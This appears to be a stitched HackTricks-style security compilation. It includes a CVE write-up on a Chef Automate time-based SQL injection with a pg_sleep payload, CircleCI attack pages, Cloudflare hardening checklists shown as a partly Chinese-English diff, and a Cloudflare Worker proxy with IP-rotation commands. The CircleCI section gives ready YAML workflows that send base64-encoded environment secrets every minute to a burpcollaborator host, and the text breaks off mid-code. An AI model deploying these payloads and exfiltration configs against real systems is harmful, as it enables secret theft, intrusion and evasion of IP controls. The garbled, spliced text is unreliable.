POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```
Observed behavior:
- Response times scale with pg_sleep(N)
- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths
> Tip: Use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.
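A simple validator of that kind can be sketched as follows; `send(n)` is whatever function fires one request with `pg_sleep(n)` injected into `filters[].type`, and the heuristic thresholds are assumptions to tune per target:

```python
import statistics
import time

def timing_medians(send, sleep_values=(0, 1, 5), trials=5):
    """Median wall-clock latency per injected pg_sleep(n) value.
    `send(n)` should POST a body like:
    {"filters":[{"type":"name'||(SELECT pg_sleep(<n>))||'","values":["test"]}]}
    """
    medians = {}
    for n in sleep_values:
        samples = []
        for _ in range(trials):
            start = time.monotonic()
            send(n)
            samples.append(time.monotonic() - start)
        medians[n] = statistics.median(samples)
    return medians

def looks_injectable(medians):
    """Heuristic: latency must grow with n well beyond baseline noise."""
    return (medians[5] > medians[1] > medians[0]
            and (medians[5] - medians[0]) > 2 * (medians[1] - medians[0]))
```

Using medians over several trials suppresses one-off network spikes that a single-request comparison would misread.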
### Impact
Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can perform time-based blind SQL injection against the Compliance service's PostgreSQL backend, allowing data inference and potential exfiltration.
## Detection and Forensics
- API layer:
  - Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
  - Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
- Database layer (PostgreSQL):
  - Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
- Authentication:
  - Log and alert on usage of x-data-collector-token, especially known default values, across API paths
## Mitigations and Hardening
- Immediate:
  - Rotate/disable default data collector tokens
  - Restrict ingress to data collector endpoints; enforce strong, unique tokens
- Code-level:
  - Parameterize queries; never string-concatenate SQL fragments
  - Strictly whitelist allowed type values on the server (enum)
  - Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
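The code-level points can be illustrated with a short sketch (SQLite stands in for PostgreSQL here; the table and column names are hypothetical, not Chef Automate's schema):

```python
import sqlite3

# Map user-supplied filter types to real column names; anything else is rejected,
# so an identifier can never be attacker-controlled.
ALLOWED_FILTER_TYPES = {"name": "name", "version": "version"}

def search_profiles(conn, filter_type, values):
    """Whitelist the identifier, bind the values as parameters."""
    column = ALLOWED_FILTER_TYPES.get(filter_type)
    if column is None:
        raise ValueError(f"filter type not allowed: {filter_type!r}")
    placeholders = ",".join("?" for _ in values)
    sql = f"SELECT id FROM profiles WHERE {column} IN ({placeholders})"
    return conn.execute(sql, list(values)).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE profiles (id INTEGER, name TEXT, version TEXT)")
conn.execute("INSERT INTO profiles VALUES (1, 'linux-baseline', '2.9')")
```

With this shape, the CVE's `name'||(SELECT pg_sleep(5))||'` payload is rejected before any SQL is assembled.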
## Practical Testing Checklist
## References
- [gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway)
- [pq PostgreSQL driver for Go](https://github.com/lib/pq)
{{#include ../../banners/hacktricks-training.md}}

# CircleCI Security
{{#include ../banners/hacktricks-training.md}}
### Basic Information
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuous Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments**, for example directly **from your repo's master branch**.
### Permissions
**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
However, you need to be a **repo admin** in order to **convert the repo into a CircleCI project**.
### Env Variables & Secrets
According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
#### Built-in env variables
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
#### Clear text
You can declare them in clear text inside a **command**:
```yaml
- run:
    name: "set and echo"
    command: |
      SECRET="A secret"
      echo $SECRET
```
You can declare them in clear text inside the **run environment**:
```yaml
- run:
    name: "set and echo"
    command: echo $SECRET
    environment:
      SECRET: A secret
```
You can declare them in clear text inside the **build-job environment**:
```yaml
jobs:
  build-job:
    docker:
      - image: cimg/base:2020.01
    environment:
      SECRET: A secret
```
You can declare them in clear text inside the **environment of a container**:
```yaml
jobs:
  build-job:
    docker:
      - image: cimg/base:2020.01
        environment:
          SECRET: A secret
```
#### Project Secrets
These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org_name>/\<repo_name>/environment-variables_
![](<../images/image (129).png>)
> [!CAUTION]
> The "**Import Variables**" functionality allows importing **variables from other projects** into this one.
#### Context Secrets
These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
![](<../images/image (123).png>)
> [!TIP]
> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
### Attacks
#### Search Clear Text Secrets
If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
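As a quick local sketch (the demo repo, file contents and grep patterns below are illustrative, not exhaustive), you can iterate over every branch of a cloned repo and grep its CircleCI config:

```shell
# Demo setup: a throwaway repo with a hardcoded token in its CircleCI config (illustrative)
REPO=$(mktemp -d)
git -C "$REPO" init -q
mkdir -p "$REPO/.circleci"
printf 'jobs:\n  build:\n    environment:\n      API_TOKEN: "hardcoded-token-123"\n' > "$REPO/.circleci/config.yml"
git -C "$REPO" -c user.email=a@b -c user.name=a add -A
git -C "$REPO" -c user.email=a@b -c user.name=a commit -qm init

# Grep each branch's .circleci/config.yml for likely clear-text secrets
for b in $(git -C "$REPO" for-each-ref --format='%(refname:short)' refs/heads/); do
  git -C "$REPO" show "$b:.circleci/config.yml" | grep -nEi 'secret|token|password|api_key'
done
```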
#### Secret Env Vars & Context enumeration
Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org_name>/contexts_.
#### Exfiltrate Project secrets
> [!WARNING]
> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
> [!CAUTION]
> The "**Import Variables**" functionality allows importing **variables from other projects** into this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
All the project secrets are always set in the env of the jobs, so just calling `env` and encoding it in base64 will exfiltrate the secrets in the **workflows web log console**:
```yaml
version: 2.1

jobs:
  exfil-env:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: "Exfil env"
          command: "env | base64"

workflows:
  exfil-env-workflow:
    jobs:
      - exfil-env
```
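On the attacker side, the blob copied from the job's web log just needs a base64 decode. A minimal local simulation (the secret value is made up):

```shell
# Simulate the job output (a base64-encoded env dump) and decode it back, as you
# would with the blob copied from the CircleCI web log console
BLOB=$(printf 'PROJECT_SECRET=super-secret-value\n' | base64)
printf '%s\n' "$BLOB" | base64 -d   # → PROJECT_SECRET=super-secret-value
```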
If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
```yaml
version: 2.1

jobs:
  exfil-env:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: "Exfil env"
          command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"

# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
  exfil-env-workflow:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only:
                - circleci-project-setup
    jobs:
      - exfil-env
```
#### Exfiltrate Context Secrets
You need to **specify the context name** (this will also exfiltrate the project secrets):
```yaml
version: 2.1

jobs:
  exfil-env:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: "Exfil env"
          command: "env | base64"

workflows:
  exfil-env-workflow:
    jobs:
      - exfil-env:
          context: Test-Context
```
If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
```yaml
version: 2.1

jobs:
  exfil-env:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: "Exfil env"
          command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"

# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
  exfil-env-workflow:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only:
                - circleci-project-setup
    jobs:
      - exfil-env:
          context: Test-Context
```
> [!WARNING]
> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
#### Escape to Cloud
**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
By default their machines are located in GCP, and you initially won't be able to find anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
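A quick way to check this from inside a job is probing the well-known link-local metadata address (the paths below are the standard GCP and AWS IMDSv1 endpoints; whether they answer depends on where the runner actually lives):

```shell
# Probe cloud metadata endpoints from inside the runner; falls through quickly if unreachable
curl -s --max-time 3 -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/ || echo "no GCP metadata service"
curl -s --max-time 3 http://169.254.169.254/latest/meta-data/ || echo "no AWS IMDSv1 endpoint"
```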
Notice that in the previous examples everything was launched inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
```yaml
jobs:
  exfil-env:
    #docker:
    #  - image: cimg/base:stable
    machine:
      image: ubuntu-2004:current
```
Or even a docker container with access to a remote docker service:
```yaml
jobs:
  exfil-env:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup_remote_docker:
          version: 19.03.13
```
#### Persistence
- It's possible to **create user tokens in CircleCI** to access the API endpoints with the user's access.
- _https://app.circleci.com/settings/user/tokens_
- It's possible to **create project tokens** to access the project with the permissions given to the token.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
- It's possible to **add SSH keys** to the projects.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
- It's possible to **create a cron job in a hidden branch** of an unexpected project that **leaks** all the **context env vars** every day.
- Or even create in a branch / modify a known job that will **leak** all context and **project secrets** every day.
- If you are a github owner you can **allow unverified orbs** and configure one in a job as a **backdoor**.
- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret**, modifying its value.
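A persisted personal token can later be checked against the CircleCI v2 REST API (the token value below is a placeholder and the call needs network access to circleci.com):

```shell
# Validate a persisted personal API token against the CircleCI v2 API (placeholder token)
CIRCLECI_TOKEN="${CIRCLECI_TOKEN:-REPLACE-WITH-YOUR-TOKEN}"
curl -s --max-time 5 -H "Circle-Token: $CIRCLECI_TOKEN" \
  https://circleci.com/api/v2/me || echo "request failed (no network?)"
```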
{{#include ../banners/hacktricks-training.md}}

View File

@@ -1,14 +1,14 @@
# Cloudflare Security
{{#include ../../banners/hacktricks-training.md}}
Cloudflare 帐户中,有一些可以配置的 **general settings and services**。在本页我们将对每个部分的 **安全相关设置** 进行 **分析:**
In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
<figure><img src="../../images/image (117).png" alt=""><figcaption></figcaption></figure>
## Websites
Review each with:
{{#ref}}
cloudflare-domains.md
@@ -16,9 +16,9 @@ cloudflare-domains.md
### Domain Registration
- [ ] **`Transfer Domains`** 中检查是否无法转移任何域名。
- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
Review each with:
{{#ref}}
cloudflare-domains.md
@@ -26,45 +26,39 @@ cloudflare-domains.md
## Analytics
_I couldn't find anything to check for a config security review._
## Pages
On each Cloudflare Pages site:
- [ ] **`Build log`** 中检查是否包含 **敏感信息**
- [ ] 检查分配给 Pages 的 **Github repository** 中是否包含 **敏感信息**
- [ ] 检查通过 **workflow command injection** `pull_request_target` 被利用导致的潜在 github repo 被攻破风险。更多信息见 [**Github Security page**](../github-security/index.html)
- [ ] 检查 `/fuctions` 目录(如果存在)中的潜在 **vulnerable functions**,检查 `_redirects` 文件(如果存在)中的 **redirects**,以及 `_headers` 文件(如果存在)中的 **misconfigured headers**
- [ ] 如果可以 **访问代码**,通过 **blackbox** **whitebox** 检查 **web page****vulnerabilities**
- [ ] 在每个页面的详细信息 `/<page_id>/pages/view/blocklist/settings/functions` 中,检查 **`Environment variables`** 是否包含 **敏感信息**
- [ ] 在详情页还要检查 **build command** **root directory** 是否存在可被注入以攻陷页面的潜在风险。
- [ ] Check for **sensitive information** in the **`Build log`**.
- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/index.html).
- [ ] Check for **vulnerable functions** in the `/functions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** testing if you can **access the code**.
- [ ] In the details of each page (`/<page_id>/pages/view/blocklist/settings/functions`), check for **sensitive information** in the **`Environment variables`**.
- [ ] In the details page, check also the **build command** and **root directory** for **potential injections** to compromise the page.
## **Workers**
On each Cloudflare Worker check:
- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**.
- [ ] Check the **code of the worker** and search for **vulnerabilities** (especially in places where the user can control the input).
- Check for SSRFs returning the indicated page that you can control.
- Check for XSSs executing JS inside an svg image.
- It is possible that the worker interacts with other internal services. For example, a worker may interact with an R2 bucket, storing in it information obtained from the input. In that case, it would be necessary to check what capabilities the worker has over the R2 bucket and how they could be abused from the user input.
> [!WARNING]
> Note that by default a **Worker is given a URL** such as `<worker-name>.<account>.workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.

For practical examples of abusing Workers as pass-through proxies (IP rotation, FireProx-style), check:

{{#ref}}
cloudflare-workers-pass-through-proxy-ip-rotation.md
{{#endref}}
## R2
On each R2 bucket check:
- [ ] Configure **CORS Policy**.
## Stream
@@ -76,8 +70,8 @@ TODO
## Security Center
- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security**-wise.
- [ ] Just **check this information** for security misconfigurations and interesting info.
## Turnstile
@@ -92,49 +86,52 @@ cloudflare-zero-trust-network.md
## Bulk Redirects
> [!NOTE]
> [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/) 不同, [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) 本质上是静态的——**不支持任何字符串替换操作或正则表达式**。不过,你可以配置影响其 URL 匹配行为和运行时行为的 URL redirect 参数。
> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
- [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
- [ ] Check also for **sensitive hidden endpoints** that contain interesting info.
## Notifications
- [ ] Check the **notifications.** These notifications are recommended for security:
- `Usage Based Billing`
- `HTTP DDoS Attack Alert`
- `Layer 3/4 DDoS Attack Alert`
- `Advanced HTTP DDoS Attack Alert`
- `Advanced Layer 3/4 DDoS Attack Alert`
- `Flow-based Monitoring: Volumetric Attack`
- `Route Leak Detection Alert`
- `Access mTLS Certificate Expiration Alert`
- `SSL for SaaS Custom Hostnames Alert`
- `Universal SSL Alert`
- `Script Monitor New Code Change Detection Alert`
- `Script Monitor New Domain Alert`
- `Script Monitor New Malicious Domain Alert`
- `Script Monitor New Malicious Script Alert`
- `Script Monitor New Malicious URL Alert`
- `Script Monitor New Scripts Alert`
- `Script Monitor New Script Exceeds Max URL Length Alert`
- `Advanced Security Events Alert`
- `Security Events Alert`
- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make sure also that webhook urls use **HTTPS**.
- [ ] As an extra check, you could try to **impersonate a cloudflare notification** to a third party; maybe you can somehow **inject something dangerous**.
## Manage Account
- [ ] **`Billing` -> `Payment info`** 中可以看到信用卡的 **后 4 位**、**到期时间** 和 **账单地址**
- [ ] **`Billing` -> `Subscriptions`** 中可以看到账户使用的 **plan type**
- [ ] **`Members`** 中可以看到账户的所有成员及其 **role**。注意如果 plan type 不是 Enterprise,只有两个角色:Administrator Super Administrator。但如果使用的是 **Enterprise** plan可以使用[**更多角色**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/)以遵循最小权限原则。
- 因此,尽可能建议使用 **Enterprise plan**
- [ ] Members 中可以检查哪些 **members** 启用了 **2FA**。**每个**用户都应启用 2FA。
- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
- Therefore, whenever possible it's **recommended** to use the **Enterprise plan**.
- [ ] In Members it's possible to check which **members** have **2FA enabled**. **Every** user should have it enabled.
> [!NOTE]
> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
## DDoS Investigation
[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,31 +2,31 @@
{{#include ../../banners/hacktricks-training.md}}
In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
<figure><img src="../../images/image (101).png" alt=""><figcaption></figcaption></figure>
### Overview
- [ ] Get a feeling of **how much** the services of the account are **used**
- [ ] Find also the **zone ID** and the **account ID**
### Analytics
- [ ] **`安全`** 中检查是否有 **速率限制**
- [ ] In **`Security`** check if there is any **Rate limiting**
### DNS
- [ ] Check for **interesting** (sensitive?) data in DNS **records**
- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domain.com)
- [ ] Check for web pages that **aren't** **proxied**
- [ ] Check for **proxied web pages** that can be **accessed directly** by CNAME or IP address
- [ ] Check that **DNSSEC** is **enabled**
- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
- This could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html#mail-spoofing)
### **Email**
TODO
@@ -36,91 +36,91 @@ TODO
### SSL/TLS
#### **Overview**
- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
- [ ] The **SSL/TLS Recommender** should be enabled
#### Edge Certificates
- [ ] **Always Use HTTPS** should be **enabled**
- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
- [ ] **Minimum TLS Version should be 1.2**
- [ ] **TLS 1.3 should be enabled**
- [ ] **Automatic HTTPS Rewrites** should be **enabled**
- [ ] **Certificate Transparency Monitoring** should be **enabled**
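Several of these edge-certificate items can be verified externally with a simple header check (example.com is a placeholder domain and the check needs network access):

```shell
# Check whether the zone sends an HSTS header over HTTPS (placeholder domain)
curl -sI --max-time 5 https://example.com | grep -i "strict-transport-security" \
  || echo "HSTS header not present (or host unreachable)"
```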
### **Security**
- [ ] **`WAF`** 部分,检查 **防火墙** **速率限制规则是否被使用** 以防止滥用是很有趣的。
- **`绕过`** 操作将 **禁用 Cloudflare 安全** 功能。它不应该被使用。
- [ ] **`页面保护`** 部分,如果使用了任何页面,建议检查它是否 **启用**
- [ ] **`API 保护`** 部分,如果在 Cloudflare 中暴露了任何 API建议检查它是否 **启用**
- [ ] **`DDoS`** 部分,建议启用 **DDoS 保护**
- [ ] **`设置`** 部分:
- [ ] 检查 **`安全级别`** 是否为 **中等** 或更高
- [ ] 检查 **`挑战通过`** 最多为 1 小时
- [ ] 检查 **`浏览器完整性检查`** 是否 **启用**
- [ ] 检查 **`隐私通行证支持`** 是否 **启用**
- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
- The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
- [ ] In the **`Settings`** section:
- [ ] Check that the **`Security Level`** is **medium** or greater
- [ ] Check that the **`Challenge Passage`** is 1 hour at max
- [ ] Check that the **`Browser Integrity Check`** is **enabled**
- [ ] Check that the **`Privacy Pass Support`** is **enabled**
#### **CloudFlare DDoS Protection**
- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you are protecting some API accessed programmatically (from a JS front-end page, for example), you might not be able to enable this without breaking that access.
- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or **block access** based on IP, Cookie, referrer... So you could block requests that don't come from a web page or don't have a cookie.
- If the attack is from a **verified bot**, at least **add a rate limit** to bots.
- If the attack is to a **specific path**, as a prevention mechanism, add a **rate limit** in this path.
- You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
- Check if **Managed rules** could also help to prevent vulnerability exploitations.
- In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents**.
- In DDoS you could **override some rules to make them more restrictive**.
- **Settings**: Set the **Security Level** to **High** (or to **Under Attack** if you are under attack) and make sure the **Browser Integrity Check is enabled**.
- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
### Access
{{#ref}}
cloudflare-zero-trust-network.md
{{#endref}}
### Speed
_I couldn't find any option related to security_
### Caching
- [ ] **`配置`** 部分考虑启用 **CSAM 扫描工具**
- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
### **Workers Routes**
_You should have already checked_ [_cloudflare workers_](#workers)
### Rules
TODO
### Network
- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
- [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
### **Traffic**
TODO
### Custom Pages
- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
### Apps
TODO
### Scrape Shield
- [ ] Check **Email Address Obfuscation** is **enabled**
- [ ] Check **Server-side Excludes** is **enabled**
### **Zaraz**
@@ -131,3 +131,6 @@ TODO
TODO
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,286 +0,0 @@
# Abusing Cloudflare Workers as Pass-Through Proxies (IP Rotation, FireProx-style)
{{#include ../../banners/hacktricks-training.md}}
Cloudflare Workers can be deployed as transparent HTTP pass-through proxies: the upstream target URL is supplied by the client. Requests egress from Cloudflare's network, so the target only sees Cloudflare IPs instead of the client's. This is similar to the well-known FireProx technique on AWS API Gateway, but using Cloudflare Workers.
### Key features

- Supports all HTTP methods (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)
- The target can be provided via a query parameter (?url=...), a header (X-Target-URL), or even encoded in the path (e.g. /https://target)
- Headers and body are passed through, with hop-by-hop/header filtering as needed
- The response is relayed back to the client, preserving the status code and most headers
- Optional X-Forwarded-For spoofing (if the Worker sets it from a controlled header)
- Very fast/easy rotation by deploying multiple Worker endpoints and fanning out requests
### How it works (flow)

1) The client sends an HTTP request to the Worker URL (`<name>.<account>.workers.dev` or a custom domain route).
2) The Worker extracts the target from the query parameter (?url=...), the X-Target-URL header, or the path segment, as implemented.
3) The Worker forwards the incoming method, headers and body to the specified upstream URL (filtering problematic headers).
4) The upstream response is streamed back to the client through Cloudflare; the origin server sees Cloudflare's egress IP.
### Example Worker implementation

- Reads the target URL from a query parameter, header, or path
- Copies a safe set of headers and forwards the original method/body
- Optionally sets X-Forwarded-For from a user-controlled header (X-My-X-Forwarded-For) or a random IP
- Adds permissive CORS and handles preflight
<details>
<summary>Example Worker (JavaScript) for a pass-through proxy</summary>
```javascript
/**
* Minimal Worker pass-through proxy
* - Target URL from ?url=, X-Target-URL, or /https://...
* - Proxies method/headers/body to upstream; relays response
*/
addEventListener('fetch', event => {
event.respondWith(handleRequest(event.request))
})
async function handleRequest(request) {
try {
const url = new URL(request.url)
const targetUrl = getTargetUrl(url, request.headers)
if (!targetUrl) {
return errorJSON('No target URL specified', 400, {
usage: {
query_param: '?url=https://example.com',
header: 'X-Target-URL: https://example.com',
path: '/https://example.com'
}
})
}
let target
try { target = new URL(targetUrl) } catch (e) {
return errorJSON('Invalid target URL', 400, { provided: targetUrl })
}
// Forward original query params except control ones
const passthru = new URLSearchParams()
for (const [k, v] of url.searchParams) {
if (!['url', '_cb', '_t'].includes(k)) passthru.append(k, v)
}
if (passthru.toString()) target.search = passthru.toString()
// Build proxied request
const proxyReq = buildProxyRequest(request, target)
const upstream = await fetch(proxyReq)
return buildProxyResponse(upstream, request.method)
} catch (error) {
return errorJSON('Proxy request failed', 500, {
message: error.message,
timestamp: new Date().toISOString()
})
}
}
function getTargetUrl(url, headers) {
let t = url.searchParams.get('url') || headers.get('X-Target-URL')
if (!t && url.pathname !== '/') {
const p = url.pathname.slice(1)
if (p.startsWith('http')) t = p
}
return t
}
function buildProxyRequest(request, target) {
const h = new Headers()
const allow = [
'accept','accept-language','accept-encoding','authorization',
'cache-control','content-type','origin','referer','user-agent'
]
for (const [k, v] of request.headers) {
if (allow.includes(k.toLowerCase())) h.set(k, v)
}
h.set('Host', target.hostname)
// Optional: spoof X-Forwarded-For if provided
const spoof = request.headers.get('X-My-X-Forwarded-For')
h.set('X-Forwarded-For', spoof || randomIP())
return new Request(target.toString(), {
method: request.method,
headers: h,
body: ['GET','HEAD'].includes(request.method) ? null : request.body
})
}
function buildProxyResponse(resp, method) {
const h = new Headers()
for (const [k, v] of resp.headers) {
if (!['content-encoding','content-length','transfer-encoding'].includes(k.toLowerCase())) {
h.set(k, v)
}
}
// Permissive CORS for tooling convenience
h.set('Access-Control-Allow-Origin', '*')
h.set('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE, OPTIONS, PATCH, HEAD')
h.set('Access-Control-Allow-Headers', '*')
if (method === 'OPTIONS') return new Response(null, { status: 204, headers: h })
return new Response(resp.body, { status: resp.status, statusText: resp.statusText, headers: h })
}
function errorJSON(msg, status=400, extra={}) {
return new Response(JSON.stringify({ error: msg, ...extra }), {
status, headers: { 'Content-Type': 'application/json' }
})
}
function randomIP() { return [1,2,3,4].map(() => Math.floor(Math.random()*255)+1).join('.') }
```
</details>
### Automating deployment and rotation with FlareProx

FlareProx is a Python tool that uses the Cloudflare API to deploy multiple Worker endpoints and rotate between them. This provides FireProx-like IP rotation on Cloudflare's network.

Setup:

1) Create a Cloudflare API Token using the "Edit Cloudflare Workers" template and get your Account ID from the dashboard.
2) Configure FlareProx:
```bash
git clone https://github.com/MrTurvey/flareprox
cd flareprox
pip install -r requirements.txt
```
**Create the configuration file flareprox.json:**
```json
{
"cloudflare": {
"api_token": "your_cloudflare_api_token",
"account_id": "your_cloudflare_account_id"
}
}
```
**CLI usage**

- Create N Worker proxies:
```bash
python3 flareprox.py create --count 2
```
- List endpoints:
```bash
python3 flareprox.py list
```
- Health-check endpoints:
```bash
python3 flareprox.py test
```
- Delete all endpoints:
```bash
python3 flareprox.py cleanup
```
**Routing traffic through the Worker**
- Query parameter form:
```bash
curl "https://your-worker.account.workers.dev?url=https://httpbin.org/ip"
```
- Header form:
```bash
curl -H "X-Target-URL: https://httpbin.org/ip" https://your-worker.account.workers.dev
```
- Path form (if implemented):
```bash
curl https://your-worker.account.workers.dev/https://httpbin.org/ip
```
- Method examples:
```bash
# GET
curl "https://your-worker.account.workers.dev?url=https://httpbin.org/get"
# POST (form)
curl -X POST -d "username=admin" \
"https://your-worker.account.workers.dev?url=https://httpbin.org/post"
# PUT (JSON)
curl -X PUT -d '{"username":"admin"}' -H "Content-Type: application/json" \
"https://your-worker.account.workers.dev?url=https://httpbin.org/put"
# DELETE
curl -X DELETE \
"https://your-worker.account.workers.dev?url=https://httpbin.org/delete"
```
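The query-parameter routing shown above can be wrapped in a small helper that builds the proxied URL or the equivalent header form; the Worker hostname below is a placeholder:

```python
from urllib.parse import urlencode

def proxied_url(worker_base: str, target_url: str) -> str:
    """Build the Worker URL that proxies to target_url via the ?url= query parameter."""
    return f"{worker_base.rstrip('/')}?{urlencode({'url': target_url})}"

def proxied_headers(target_url: str) -> dict:
    """Alternative: express the target via the X-Target-URL header instead."""
    return {"X-Target-URL": target_url}

if __name__ == "__main__":
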